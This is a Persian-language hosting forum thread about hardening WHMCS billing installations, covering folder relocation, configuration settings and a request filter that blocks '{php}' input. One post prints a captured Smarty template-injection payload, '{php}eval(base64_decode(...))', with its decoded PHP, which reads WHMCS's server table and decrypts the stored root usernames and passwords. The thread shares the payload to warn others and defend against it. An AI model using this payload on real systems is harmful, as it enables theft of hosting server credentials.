شما آخرین نسخه whmcs رو به صورت قانونی تهیه کنید و با توجه آموزش خود whmcs از لینک زیر اقدام کنید هیچ مشکلی پیش نمی یاد:
Further Security Steps - WHMCS Documentation
ما از این طریق اقدام کردیم و هک هم نشدیم
شما آخرین نسخه whmcs رو به صورت قانونی تهیه کنید و با توجه آموزش خود whmcs از لینک زیر اقدام کنید هیچ مشکلی پیش نمی یاد:
Further Security Steps - WHMCS Documentation
ما از این طریق اقدام کردیم و هک هم نشدیم
من بالاخره موضوع این صفرها رو نفهمیدم
مگه بدون تعریف دیتابیس و اینها پنل کار میکنه ؟
دوستمون گفتم صفر بزارید اما تو این حالت مشکلی پیش نمی اد ؟ میشه یکم موضوع این صفرها رو باز کنید ؟
<?php
$license = "Leased-00000000000000";
$db_host = "localhost";
$db_username = "0000000000000000000";
$db_password = "000000000000000000000";
$db_name = "0000000000000000000000000";
دوست من ایشون فایل کانفیگ خودشون رو مثال زدن و جای نام دیتابیس خودشون 000 زدن شما دیتابیس خودتون رو قرار بدید نمیتونن ایشون تو مثال یوزر و پسورد دیتابیس خودشون رو قرار بدن که
---------- Post added at 10:32 AM ---------- Previous post was at 10:30 AM ----------
اگر هکر یک هکر واقعی باشه و خودش کد base64 رو دستکاری کرده باشه که میشه خیلی راحت هم اینکارو کرد ممکنه تو هر پوشه ای از فایلهای شما اینکارو کرده باشه
اگر کسی قبلا چنین تیکت هایی ارسال کرده و حذفش نکردید اون کد رو بریزید تو نود پد
پ.خ کنید تا بگم کجا دست برده. (دیکد بکنم براتون)
میزبان داده پرداز - روبینا سرور - (تلفن و راه های ارتباطی - Roobinaserver.ir)
پرووایدر خدمات دیتاسنتری در تهران
از سال 1385 تا کنون
اگر هکر یک هکر واقعی باشه و خودش کد base64 رو دستکاری کرده باشه که میشه خیلی راحت هم اینکارو کرد ممکنه تو هر پوشه ای از فایلهای شما اینکارو کرده باشه
اگر کسی قبلا چنین تیکت هایی ارسال کرده و حذفش نکردید اون کد رو بریزید تو نود پد
پ.خ کنید تا بگم کجا دست برده. (دیکد بکنم براتون)[/QUOTE]
نه دست نبرده فقط میخوام بدونم همین کارها کافیه یا باید کار دیگه ای هم انجام بشه ؟
با عرض سلام -من هرکار کردم نتونستم جای پوشه ها را عوض کنم یعنی تا کد را میزارم این اخطار را میده
The templates compiling directory '/home/***********/templates_c/' must be writeable (CHMOD 777) before you can continue.
If the path shown is incorrect, you can update it in the configuration.php file.
فرض کنید من whcms را در پوشه clinet قرار دادم و 3 تا پوشه یاد شد را در پوشه a قرار دادم حالا کدم به چه صورت میشه ؟
"و دومین کار انتقال سه پوشه ی templates_c و attachments و downloads به لوکال یعنی جایی که به صورت پیش فرض بکاپ گرفته شده از سیپنل ذخیره میشه"
این لوکال کجا است ؟ دقیقا اسم پوشه اش چیه من پوشه ای به این نام ندیدم ؟
با تشکر
ویرایش توسط hossein535 : April 9th, 2012 در ساعت 13:44
سه تا پوشه گفته شده رو نباید توی پوشه a قرار بدید.
فرض کنید سه پوشه این ها هستند:
$templates_compiledir = "/home/hamid/public_html/client/templates_c/";
$attachments_dir = "/home/hamid/public_html/client/attachments/";
$downloads_dir = "/home/hamid/public_html/client/downloads/";
مثلا whmcs شما هست:
/home/hamid/public_html/client
حالا اون سه پوشه رو میزارید توی آدرس زیر:
home/hamid
و در فایل configuration.php هم کدهای گفته شده رو میزارید:
$templates_compiledir = "/home/hamid/templates_c/";
$attachments_dir = "/home/hamid/attachments/";
$downloads_dir = "/home/hamid/downloads/";
شرکت پرتو فرا رایان ، ارائه دهنده سرویس های میزبانی وب ، ثبت دامنه ، نمایندگی هاست و دامنه ، طراحی وب و...
PartoData.com [+]
,Services : WebHosting , Domain Registration , Reseller , FileHosting [+]
Server Locations : Iran , UK [+]
سلام و خسته نباشید امروز متوجه شدم یکی از دوستان عزیزمون بازم یه کد جدید پیدا کرده که نیمه کاره کپی کرده ولی برای شما هم میگذارم تا با اون آشنا بشید این کد بیس 64 شده اش هست
{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1c mF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSg iU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kd GV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9 TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcc lxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF 1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzc yddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHl wZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2Z SddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0 KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sI CRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4 iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2Z SAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWU gJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwY WRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR 1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkI CRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKio qKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0Z Xh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1N UIFJPT1RTICMjIyMjIyMjIyM
که بعد از کد گشای تقریبا یه همچین چیزی میشه
zm^r^
include('configuration.php');
$query = mysql_query("SELECT * FROM tblservers");
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
$password = decrypt ($v['password'], $cc_encryption_hash);
$text=$text."Type $type\r\n";
$text=$text."Active $active\r\n";
$text=$text."Hostname $hostname\r\n";
$text=$text."Ip $ipaddress\r\n";
$text=$text."Username $username\r\n";
$text=$text."Password $password\r\n************************************* *\r\n";
}
$text=$text."\r\n######################### HOST ROOTS ##########
اگه به کدش توجه کنید با شامل کردن فایل کانفیگ از تیبل سرور میخواد یوزر و پسورد هاست ها رو به دست بیاره
همون طوری که در این سایت هم خواندید با بلوک کردن php و آپدیت به آخرین ورژن میشه جلوی این جور ایمیل ها رو گرفت .
جالب این جاست که هم وطنان خودمون میان این کارها رو انجام میدن .
با تشکر از مدیریت وب هاستینگ تالک . مرادپور
بعد از اینکه تمام مراحل امنیتی رو اکی کردید
داخل فایل کانفیگ این کدو بذارید
جای Hacking Attempt هر دردو دلی با اون هکر .... داشتی میتونی بنویسیforeach ($_REQUEST as $value)
{
if(strpos(strtolower($value), "{php}") !== false)
die("Hacking Attempt !");
}
بله با توجه به روش دوست گلمون Ashkankamangar.ir بايد در نظر داشت كه whmcs خودش جايي براي اين كد نويسي ها در نظر گرفته است
با يك كد نويسي ساده از دست اين اسپام ها خلاص شديم علاوه بر اين امنيت قسمت هاي ديگه هم را در كنترل گرفتيم و حالا هر كس اقدام كنه بي برو برگرد بن ميشه
با توجه به اين كه جوجه هكرا جز اسپام مزاحمت ديگه اي نداشتن و معمولا با ويـ بيـ انـ وصل ميشن با بن شدن دسشون بد جوري كوتا ميشه و![]()
در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)